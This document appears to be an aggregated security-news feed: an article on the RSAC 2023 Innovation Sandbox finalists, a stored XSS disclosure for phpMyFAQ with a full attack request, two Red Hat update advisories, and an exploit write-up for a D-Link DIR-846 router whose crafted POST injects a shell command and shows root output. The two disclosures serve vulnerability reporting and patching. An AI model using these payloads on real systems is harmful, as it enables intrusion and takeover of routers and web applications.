Application security is the dominant trend for this year's startup contest, but AI, blockchain, and compliance are all represented as well.

The need for complying with government rules, securing post-pandemic distributed workforces, and improving artificial intelligence (AI) capabilities is driving the cybersecurity startup scene this year, as demonstrated by the 10 finalists for the RSA Conference 2023 Innovation Sandbox competition.

"\[A\]pplication security (AppSec) is well represented in the competition, which is symptomatic of where we are in the digital transformation process," wrote Omdia senior principal analyst Rik Turner. (Link requires registration.)

Turner attributed the continued rise in AppSec interest to the growth of remote access fueled by the COVID-19 pandemic that closed offices and schools worldwide and forced organizations to adapt to remote access.

"The WFH trend is, at least in part, certain to continue, even as the pandemic ebbs into endemic status," he said.

At the live event on Monday, April 24, at RSA Conference in San Francisco, judges will hear presentations from these 10 finalists, listed in alphabetical order: AnChain.AI; Astrix Security; Dazz; Endor Labs; HiddenLayer; Pangea; Relyance AI; SafeBase; Valence Security; and Zama.

**Big Year for AppSec**

The importance of AppSec — eliminating security vulnerabilities at the application level during development and implementation — was underscored by the Log4j crisis.

"With modern app architecture increasingly componentized and ever more willing to reach out to third-party apps for services such as payments and maps, threat actors can now compromise one website to gain access to the apps on many others," Turner said.

Astrix aims to secure the communications between apps of all kinds, an area sometimes called SaaS-to-SaaS security. It emphasizes extending access management to machine and other nonhuman identities to make connecting an organization's core systems to cloud services safer.

Dazz offers "accelerated cloud remediation," which uses automation to winnow down security alerts and smooth out developers' workflow. Besides its potential to improve the speed and accuracy of a first wave of incident response, automation can reduce alert fatigue, a much-discussed element of burnout.

Endor Labs focuses on tracking and managing open source components, which Log4j revealed as a largely untracked and widespread source of potential vulnerabilities. Software bills of materials (SBOMs) grew in prominence when US President Joe Biden issued an executive order in May 2021, mandating the creation of SBOMs in the wake of the Colonial Pipeline hack.

"\[E\]ven before then, the sheer amount of open-source libraries that developers were embedding in their code had become a major source of concern, giving rise to the emergence of an entirely new market segment, called software composition analysis (SCA)," Turner pointed out.

Pangea helps organizations create secure, compliant cloud security services by using a block-based API builder and hosting the services itself.

"Organizations don’t necessarily know whether the APIs written by their own developers are secure, let alone the third-party APIs that their apps may be using once they're in production," Turner wrote.

By using this library of secure APIs, developers avoid the entanglements of open source libraries typically tapped when building applications.

**The Role of AI**

AI has been hot, but with ChatGPT having a pop culture moment — and raising its own security concerns — companies are couching their products in AI terms wherever sensible. And while some AI hype is just jumped-up automation, AI has brought a lot of benefits to cybersecurity.

Relyance AI emphasizes machine learning as a way to track personal data as it moves through internal and third-party APIs, as well as other systems, in order to ensure compliance with privacy regulations. Turner classed the company as "a data security company that also has one foot in the AppSec world ... with technology designed to address the business environment that digital transformation creates."

HiddenLayer looks to secure an underrated business asset: machine learning data sets. Its technology, which the company calls machine learning detection and response (MLDR), monitors ML algorithms' inputs and outputs to look for "anomalous activity consistent with adversarial ML attack techniques," the company says.

The stakes are high — if the machine learning training data is corrupted, its outputs will be faulty, and it's difficult to peer inside the black box to see what the problem is.

"After all, anyone who can 'poison the well' of data being used in such analytical exercises has the potential to skew their outcomes, resulting in bad or erroneous insights, whether they be for business decisions, medical procedures, or even military strategy," Turner said.

**Web3 Protections**

AnChainAI secures a very Web3 asset: the blockchain. With a recent wave of cryptocurrency heists and concomitant calls for regulation, organizations that maintain crypto wallets need to ensure they are not a victim of — or party to — crime. The company built a predictive engine to identify and flag suspicious transactions, and it aims to sell its Know Your Wallet, forensics, and contract evaluation services to financial institutions, asset owners, and governments.

Zama also addresses Web3 concerns with a set of open source cryptographic tools for building fully homomorphic encryption (FHE) applications that protect data security. The company says its tools allow data to be processed without being decrypted, which allows true end-to-end encryption. Zama sees its technology as enabling the next stage of Web security, "httpz," which the company says goes beyond https-based security to encryption.

**Serious Business**

SafeBase creates a centralized repository of security policies and compliance documentation to make security reviews faster. It addresses a specialized but necessary part of third-party risk management, including distributing updated certifications and managing nondisclosure agreements.

Turner noted the value of a "single source of truth, but pointed out, "The big question must be how those customers can then verify that the data they are receiving from the Trust Center is legitimate."

Valence Security secures cloud workflows using SaaS security posture management (SSPM). It uses a combination of services to monitor a client's mesh of third-party SaaS applications, detect and remediate misconfigurations, and manage identity security. Turner noted that while there's lots of opportunity in the SSPM space and cloud security market, that means Valence faces a fair amount of competition as well.

The winner will be announced at the end of the presentations. The judges this year are Niloofar Razi Howe, senior operating partner at Energy Impact Partners; Paul Kocher, independent researcher and founder of Cryptography Research; Shlomo Kramer, co-founder and CEO of Cato Networks; Barmak Meftah, co-founder and general partner at Ballistic Ventures; and Christopher Young, executive VP of business development, strategy, and ventures at Microsoft. All but Meftah are returning as judges from last year.

AppSec Looms Large for RSAC 2023 Innovation Sandbox Finalists

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Code That has a Vulnerability:

                // Updates an existing category
                if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
    
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                    $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                    $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                    $image = count($uploadedFile) ? $categoryImage->getFileName(
                        $categoryId,
                        $categoryLang
                    ) : $existingImage;
    
                    $categoryData = [
                        'id' => $categoryId,
                        'lang' => $categoryLang,
                        'parent_id' => $parentId,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $image,
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                    ];
    

Code without that vulnerability:

                // Save a new category
                if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                    $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                    $categoryData = [
                        'lang' => $categoryLang,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                    ];
    

Request:

    POST /admin/?action=updatecategory HTTP/2
    Host: roy.demo.phpmyfaq.de
    Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
    Content-Length: 1934
    Origin: https://roy.demo.phpmyfaq.de
    Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="catlang"
    
    en
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="parent_id"
    
    0
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="csrf"
    
    EDITthis
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="existing_image"
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="name"
    
    <script>alert(1)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="description"
    
    </textarea><script>alert(2)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="active"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="show_home"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="image"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="user_id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="grouppermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="userpermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="restricted_users"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------14208207025422371582565391486--
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs

CVE-2023-1879: Stored XSS @ updatecategory in phpmyfaq

Red Hat Security Advisory 2023-1660-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1660-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1660  
Issue date:        2023-04-05  
CVE Names:         CVE-2023-0266 CVE-2023-0386   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: FUSE filesystem low-privileged user privileges escalation  
(CVE-2023-0386)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.src.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.src.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.src.rpm

ppc64le:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-1.el8_6.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-372_26_1-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2QfNzjgjWX9erEAQgNNg/9Eho8CXtXoHqZQdLrGhk/KvGhNdZ75hDt  
nARC7hATfax98FiwvYMvEcL9ZdBGzrxcsd9yXmE+TT8pKlu2x2AX10Y8EAKg76GX  
YSWS6YpVHmrxi2pV7w5WjPqY+Xz7pbTxhCqXxJF6AeiaDgpq29N8XxlIwy12VNey  
N6RuS9pUQ9JjuE3RnxYdWUD1AzHFjM9OZsSs1jEJr9RLKzoYHuo9SD+Md7PAyaba  
ifrzTxNOcAfbZME1O30dObcKgJM10No4gTvxrwA7V6ZSHMNl9qn9mtKFdGrqnl70  
RHXL4NkeJJJ2yDw9SEqQevc/tPfP2rqEenn35UK6smANdXNL2OQ1GLXnCu+rF6e9  
KOltIkQJ+ypYU5ot5g6KsvlCB4vXJ1FJe5aBAhHrKpuQds7IkyNoy9mPoIs/Mjen  
bS2dX7AsI3uT28qxkrsEQRGS9Okh2FsMQjjLe+f0KeerxA8e5feVJBRUS42Schab  
TTw2NU5W+sfRa20kDcm/fkt/7Ft8qFRnUHqAbJTlvvepL8hodl2RtU0eymACVk0T  
kTRK44aoZJFbLAbTuiQHFlDTnWi+0O2PoFga5l5XhbF/9zc6hk29rR0hM1BbcHje  
LBWtNTttvPBwBg5hv1/VvCniiIVMPYvcRYg5RDAA3knXd5IEtOats4UBTTxnVg0W  
sQWzQbcINb0=  
=plbD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1660-01

D-Link DIR-846 suffers from a remote command execution vulnerability.

    # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA# Date: 30/01/2023# Exploit Author: Françoa Taffarel# Vendor Homepage:https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Software Link:https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Version: DIR846enFW100A53DBR-Retail# Tested on: D-LINK DIR-846# CVE : CVE-2022-46552D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remotecommand execution (RCE) vulnerability via the lan(0)_dhcps_staticlistparameter. This vulnerability is exploited via a crafted POST request.### Malicious POST Request```POST /HNAP1/ HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonSOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285Content-Length: 171Origin: http://192.168.0.1Connection: closeReferer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}```### Response```HTTP/1.1 200 OKX-Powered-By: PHP/7.1.9Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-type: text/html; charset=UTF-8Connection: closeDate: Thu, 01 Dec 2022 11:03:54 GMTServer: lighttpd/1.4.35Content-Length: 68{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}```### Data from RCE Request```GET /HNAP1/rce_confirmed HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1Upgrade-Insecure-Requests: 1```### Response```HTTP/1.1 200 OKContent-Type: application/octet-streamAccept-Ranges: bytesContent-Length: 24Connection: closeDate: Thu, 01 Dec 2022 23:24:28 GMTServer: lighttpd/1.4.35uid=0(root) gid=0(root)```

D-Link DIR-846 Remote Command Execution

Red Hat Security Advisory 2023-1630-01 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. Issues addressed include an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Satellite 6.12.3 Async Security Update  
Advisory ID:       RHSA-2023:1630-01  
Product:           Red Hat Satellite 6  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1630  
Issue date:        2023-04-04  
CVE Names:         CVE-2022-41946   
=====================================================================

1. Summary:

Updated Satellite 6.12 packages that fixes important security bugs and  
several  
regular bugs are now available for Red Hat Satellite.

2. Relevant releases/architectures:

Red Hat Satellite 6.12 for RHEL 8 - noarch

3. Description:

Red Hat Satellite is a system management solution that allows organizations  
to configure and maintain their systems without the necessity to provide  
public Internet access to their servers or other client systems. It  
performs provisioning and configuration management of predefined standard  
operating environments.

Security fix(es):

* Candlepin: PreparedStatement.setText(int, InputStream) will create a  
temporary file if the InputStream is larger than 2k (CVE-2022-41946)

This update fixes the following bugs:

2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates  
not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object  
has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not  
find virtual machine network interface matching <IP>  
2174997 - Package and Errata actions on content hosts selected using the  
"select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot  
belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass"  
while syncing from quay.io  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE  
provisioning when boot_mode is static  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11   
2174995 - Health check should use hostname -f  
2175007 - [regression] data.yml is referring to old sync plain id which  
does not exist in katello_sync_plans  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by  
maintain as OK to interrupt  
2175010 - Some custom repositories are failing to synchorize with error  
"This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176922 - [RFE] Need syncable yum-format repository imports   
2175003  - Can't perform incremental content exports in syncable format 

Users of Red Hat Satellite are advised to upgrade to these updated  
packages, which fix these bugs.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not find virtual machine network interface matching <IP>  
2174995 - Health check should use hostname -f  
2174997 - Package and Errata actions on content hosts selected using the "select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass" while syncing from quay.io  
2175003 - Can't perform incremental content exports in syncable format  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE provisioning when boot_mode is static  
2175007 - [regression] data.yml is referring to old sync plain id which does not exist in katello_sync_plans  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11  
2175010 - Some custom repositories are failing to synchorize with error "This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by maintain as OK to interrupt  
2176922 - [RFE] Need syncable yum-format repository imports

6. Package List:

Red Hat Satellite 6.12 for RHEL 8:

Source:  
candlepin-4.1.20-1.el8sat.src.rpm  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
rubygem-katello-4.5.0.32-1.el8sat.src.rpm  
rubygem-optimist-3.0.1-1.el8sat.src.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
candlepin-4.1.20-1.el8sat.noarch.rpm  
candlepin-selinux-4.1.20-1.el8sat.noarch.rpm  
foreman-3.3.0.21-2.el8sat.noarch.rpm  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
foreman-dynflow-sidekiq-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ec2-3.3.0.21-2.el8sat.noarch.rpm  
foreman-gce-3.3.0.21-2.el8sat.noarch.rpm  
foreman-journald-3.3.0.21-2.el8sat.noarch.rpm  
foreman-libvirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-openstack-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ovirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-postgresql-3.3.0.21-2.el8sat.noarch.rpm  
foreman-service-3.3.0.21-2.el8sat.noarch.rpm  
foreman-telemetry-3.3.0.21-2.el8sat.noarch.rpm  
foreman-vmware-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
rubygem-katello-4.5.0.32-1.el8sat.noarch.rpm  
rubygem-optimist-3.0.1-1.el8sat.noarch.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.noarch.rpm  
satellite-6.12.3-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
satellite-capsule-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm

noarch:  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCyTXNzjgjWX9erEAQh57hAAknElDhu4y424D1I96zILtTXiJrw+50LC  
xD4Vj3M7gY44/6QgBg8H4YzfKZjdWGAX1byaDC6Wzb6RqtSnU7LCGI3PwA4+N3SY  
a0AidcKXV0LccwTDQcykzNC47KABGDShLFmXx5jGKn7LNWxrZRpSPk9G/jJ2tD4T  
/TaZQT20pxFXKs4vZvqXkjBDk0NXMT60fv128iXsloriajum1g3IcmJoB5R4tHFF  
bKp+sTWBVlOBwjN1qvXZ/A8JkvzKiyeMeVRM/sAoiFHNdaKFiUAsafebXTJJ55YC  
7zHqsAIO1MznhhHuW7xqE4cJb58HBYDA/Q7xD5NONFYJn+nMWe6wNgB7GOL2vNOR  
18wT35+BOjUnY0N1Ew9EllAeNOP2rHn9Rknvr9N3Z3WVzUU6Jsn4JyicdVi96xj7  
1G/Mwu2/I4fZE0SkLF3YUI1eB0akNa9lASZ/i29XbyL3HuYhDLkdQ2qrRrCWOHf3  
MxkYFoBaQlKLnWI21B1AkqIcxiqfQQ9CRECTTl86R3IZRnnV49IXrowSIAZJQy0r  
